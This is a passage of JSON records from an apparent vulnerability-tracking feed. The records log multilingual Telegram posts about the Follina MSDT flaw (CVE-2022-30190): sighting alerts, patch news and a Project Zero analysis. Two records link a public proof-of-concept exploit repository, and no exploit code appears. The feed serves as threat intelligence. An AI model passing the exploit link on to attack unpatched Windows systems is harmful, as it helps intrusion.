"exploited", "source": "https://t.me/breachdetector/91346", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Telegram Channel\",\n  \"Threat Actor\": \u201cVPwnd\",\n  \"Content\": \"MSDT ZERO-DAY https://github.com/PwnC00re/PoC-CVE-2022-30190\u201d,\n  \"Detection Date\": \u201c01 Jun 2022 03:36\u201d,\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-01T03:42:55.000000Z"}, {"uuid": "62465382-7277-4c29-8d6a-39a2b4c3298a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/8yasABRsBeQ7_fA7ekcVN5-Bf6YalSSK4RwFtvSF2nNKkrM", "content": "", "creation_timestamp": "2022-12-06T17:10:12.000000Z"}, {"uuid": "04111029-4633-4839-8210-d669f44c7419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/proxy_bar/1190", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. 
Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T06:36:16.000000Z"}, {"uuid": "47ae0439-8683-4f4a-ab7a-85fe4c13df11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/-hSjE6tQsby1bK59117CS79M8pJZfwuegK8pW2OS8URrTA", "content": "", "creation_timestamp": "2022-06-06T13:20:17.000000Z"}, {"uuid": "c0f912e3-1479-48b4-8f98-f6a4e13a56c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/V4aMGqbF9E7u6db2vlWqjJ0xbg8yD-1GzjUeht6dlSqLYG8", "content": "", "creation_timestamp": "2022-09-12T05:42:06.000000Z"}, {"uuid": "33dabe3e-82f4-44f4-9533-ad2cfc7fb043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/492", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "8ad1605e-5738-425d-acc6-dacc72612279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/190", "content": "\u0647\u0634\u062f\u0627\u0631!\n\n\u0646\u0648\u0628\u062a\u06cc \u0647\u0645 \u0628\u0627\u0634\u0647 \u0627\u06cc\u0646 \u0628\u0627\u0631 \u0646\u0648\u0628\u062a \u0645\u0627\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u0650!\n\n\u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0647\u0645 \u062f\u06cc\u06af\u0631\u06cc \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 Diagnosis 
\u0648\u06cc\u0646\u062f\u0648\u0632 \u0645\u0628\u062a\u06cc \u0628\u0631 \u0634\u0646\u0627\u0633\u0647 CVE-2022-30190 \u062a\u0648\u0633\u0637 \u0628\u062e\u0634 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a\u060c \u062e\u0628\u0631\u0633\u0627\u0632 \u0634\u062f.\n\u0627\u06cc\u0646 \u0636\u0639\u0641 \u0627\u0645\u0646\u06cc\u062a\u06cc \u06a9\u0647 \u0628\u0647 \"Follina\" \u0645\u0639\u0631\u0648\u0641 \u0627\u0633\u062a \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 MSDT \u06cc\u0627 Diagnostic Tools \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u062e\u0637\u0631 \u0648 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0641\u0646\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0627\u06cc\u0646 \u062e\u0635\u0648\u0635 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0644\u06cc\u0646\u06a9 \u0631\u0633\u0645\u06cc \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0645\u0631\u0627\u062c\u0639\u0647 \u0646\u0645\u0627\u06cc\u06cc\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a \u0631\u0633\u0645\u06cc: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "creation_timestamp": "2022-05-31T20:54:26.000000Z"}, {"uuid": "9a81379b-b1bf-41ee-aa69-d51555dd6016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3060", "content": "Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 PatchTuesday \u0437\u0430 \u0438\u044e\u043d\u044c 2022, \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0432 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 55 
\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0435\u043a 0-day Follina.\n\n\u0421\u0440\u0435\u0434\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0445: 3 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 RCE, 51 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u0430 - \u043a\u0430\u043a \u0432\u0430\u0436\u043d\u0430\u044f \u0438 \u043e\u0434\u043d\u0430 - \u043a\u0430\u043a \u0443\u043c\u0435\u0440\u0435\u043d\u043d\u0430\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e,\u00a0\u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 Microsoft Edge \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b 5 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0431\u0449\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: 12 - \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439; 1 - \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, 27 - RCE, 11 - \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, 3 - \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438, 1 - 
\u0441\u043f\u0443\u0444\u0438\u043d\u0433. \u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0437\u0434\u0435\u0441\u044c.\n\n\u0413\u043b\u0430\u0432\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u0435\u043c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043f\u0430\u0442\u0447\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 Follina, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Windows Microsoft Diagnostic Tool (MSDT) \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word.\n\n\u041f\u043e\u043c\u0438\u043c\u043e CVE-2022-30190 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0440\u0443\u0433\u0438\u0445 RCE \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC \u0438 Azure RTOS GUIX Studio.\n\n\u0415\u0449\u0435 \u043e\u0434\u043d\u0438\u043c \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c 
\u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f\u00a0CVE-2022-30147\u00a0(\u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8), \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u043c \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0438 \u0441 \u043e\u0442\u043c\u0435\u0442\u043a\u043e\u0439 Microsoft - \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430\u044f\u00bb.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0434\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0438\u043b\u044c\u043d\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442, \u0432\u0435\u0434\u044c \u043f\u043e\u043c\u043d\u0438\u0442\u044c\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430\u00a0\u043e\u0447\u0435\u0440\u0435\u0434\u0438\u00a0\u043f\u0435\u0447\u0430\u0442\u0438\u00a0\u0432\u044b\u0445\u043e\u0434\u0438\u043b \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0447\u0443\u0442\u044c \u043b\u0438 \u043d\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u043c\u0435\u0441\u044f\u0446, \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043b \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0430\u0442\u0447, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0434\u043e\u0431\u0438\u043b\u0438 \u0431\u0430\u0433\u0443. 
\u041d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u0444\u0430\u043a\u0442.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, Microsoft \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u043e\u0431\u043b\u0430\u0436\u0430\u043b\u0438\u0441\u044c: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u043d\u044f\u043b\u043e 2 \u043d\u0435\u0434\u0435\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0442\u043e\u0433\u0434\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0432\u043e\u043f\u0440\u043e\u0441, \u0430 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u043e \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0440\u0430\u043d\u044c\u0448\u0435, \u0432\u0435\u0434\u044c \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435. 
\u041d\u043e \u043e\u0442\u0432\u0435\u0442 \u0432\u044b \u0443\u0436\u0435 \u0437\u043d\u0430\u0435\u0442\u0435.", "creation_timestamp": "2022-06-15T16:10:07.000000Z"}, {"uuid": "5e064c8f-2fe2-4e15-869a-55709df96bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3129", "content": "\u041d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u044c \u043d\u0430 \u0442\u0435 \u0436\u0435 \u0433\u0440\u0430\u0431\u043b\u0438 \u0432 \u043c\u0438\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0430 \u201c\u043b\u0430\u0442\u0430\u0442\u044c \u0434\u044b\u0440\u044b\u201d \u043f\u043e\u0440\u043e\u0439, \u0441\u0442\u043e\u0438\u0442 \u0431\u043e\u043b\u0435\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e. 
\n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e \u0447\u0435\u043c \u0440\u0435\u0447\u044c, \u0430 \u0432\u043e\u0442 \u043e \u0447\u0435\u043c: \u043f\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 Google Project Zero \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2022 \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 18 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430 \u041c\u044d\u0434\u0434\u0438 \u0421\u0442\u043e\u0443\u043d\u0430 9 \u0438\u0437 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 0-day, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c, \u0435\u0441\u043b\u0438 \u0431\u044b 
\u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0430 4 \u043e\u0448\u0438\u0431\u043a\u0438 2022 \u0433\u043e\u0434\u0430 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0434\u043d\u0435\u0439 2021 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0421\u0430\u043c\u0430\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0438\u0437 \u044d\u0442\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Windows, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u043f\u043e \u0441\u0443\u0442\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f MSHTML, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043a\u0430\u043a CVE-2021-40444.\n\nCVE-2022-21882 \u2014 \u044d\u0442\u043e \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e 
\u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-1732 .\n\n\u041e\u0448\u0438\u0431\u043a\u0430 iOS IOMobileFrameBuffer (CVE-2022-22587) \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043f\u0443\u0442\u0430\u043d\u0438\u0446\u0435\u0439 \u0442\u0438\u043f\u043e\u0432 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 Chrome V8 (CVE-2022-1096) \u2014 \u044d\u0442\u043e \u0434\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 \u2014 CVE-2021-30983 \u0438 CVE-2021-30551 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u0414\u0440\u0443\u0433\u0438\u043c\u0438 0-day 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0444\u0435\u043a\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f CVE-2022-1364 (Chrome), CVE-2022-22620 (WebKit), CVE-2021-39793 (Google Pixel), CVE-2022-26134 (Atlassian 
Confluence) \u0438 CVE-2022-26925 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a PetitPotam).\n\n\u0412 \u043e\u0431\u0449\u0435\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0442\u0430\u043a, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u043b\u0438\u0431\u043e \u0441\u043d\u043e\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0435 \u0436\u0435 \u043e\u0448\u0438\u0431\u043a\u0438.\n\n\u042d\u0442\u043e \u0432\u0441\u0435\u0433\u0434\u0430 \u0433\u0440\u043e\u043c\u043a\u043e \u0438 \u0431\u043e\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0442\u0447\u0430\u0441\u0442\u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u043a\u043e\u0433\u0434\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b 0-day \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u044d\u0442\u043e \u043d\u0435\u0443\u0434\u0430\u0447\u0430 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0434\u043b\u044f \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430 \u044d\u0442\u043e \u043f\u043e\u0434\u0430\u0440\u043e\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 
\u0443\u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b, \u0447\u0442\u043e\u0431\u044b \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u043d\u0435\u043b\u044c\u0437\u044f \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.\n\n\u0427\u0442\u043e\u0431\u044b \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c 